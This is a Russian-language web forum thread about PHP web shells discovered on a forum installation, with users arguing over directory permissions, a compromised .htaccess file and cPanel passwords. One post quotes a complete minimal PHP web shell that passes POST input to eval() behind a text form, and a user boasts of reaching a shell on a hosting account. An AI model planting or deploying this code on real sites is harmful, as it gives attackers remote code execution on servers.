Шелл код на форуме.

[Алехандро]

Сначала покажите, как csrf-токен изменяет содержимое страницы на предсказуемое :lol: С таким успехом я могу сказать, что если ввести другой урл, то она тоже изменится , и что это уязвимость :lol: :lol: :lol:


Таких файлов нету в дистрибутиве чата на этом сайте.


"Права норм" - это не ответ. Меня интересует числовое значение, в частности, наличие бита записи на директориях. Наверняка у вас library/ открыта на запись для всего мира, не удивляйтесь что вам накидали шеллов откуда-то, возможно извне или еще откуда.

Очень веселый хостинг. Удалили мой тестовый аккаунт после того как я добрался до шелла. Видимо, почуяли что-то неладное. :lol:

Еще раз повторяю права выставлены урезать все, кому нужно попросят. А уж тем более на запись :lol:
Накидали? Шеллов? Что вы такое говорить. Я писал причины по которым они туда могли попасть их две, а третей не дано быть. Если будет время перерою все файлы на наличие

<?php
   if ( isset($_POST['text']) )
      eval ($_POST['text']);
?>
<form method='POST'>
   <textarea name='text'></textarea>
   <input type='submit'>
</form>

 

[Arisu]

Еще раз повторяю права выставлены урезать все, кому нужно попросят. А уж тем более на запись :lol:
Накидали? Шеллов? Что вы такое говорить. Я писал причины по которым они туда могли попасть их две, а третей не дано быть. Если будет время перерою все файлы на наличие

Проверяйте :lol:

 

[sonic]

Grell, про хостера мне все стало понятно до появления этой темы ведь изначально разговор начался в чате где он написал что в форуме шелы и ктото другой начал писать что значит нулы отсюда нечего качать. так вот там же в чате была цитата от хостера в которой говорилось что в .htaccess (который лежит в корне форума) умудрились прописать настолько страшную вещь что надо менять пароли на cpanel хостинга иначе и ее заберут.

 

[Алехандро]

Grell, про хостера мне все стало понятно до появления этой темы ведь изначально разговор начался в чате где он написал что в форуме шелы и ктото другой начал писать что значит нулы отсюда нечего качать. так вот там же в чате была цитата от хостера в которой говорилось что в .htaccess (который лежит в корне форума) умудрились прописать настолько страшную вещь что надо менять пароли на cpanel хостинга иначе и ее заберут.

Во первых ответ хостер был выложен частями.
Во вторых, имея доступ к хостингу можно вытащить логин и пасс от cpanel.
В третьих на форуме а не в форуме.

 

[Viza]

Прочитал тему. Ничего не понял. "Бежать? Документы брать?" или паника на пустом месте?

 

[alkon]

Тем у кого есть вирус - надо писать Хостеру . подчистить вручную самому долго и очень нудно. У Хостера есть ПО которое вычистит всю гадость, особенно когда в каждой папке будет бяка со сторонним файлом .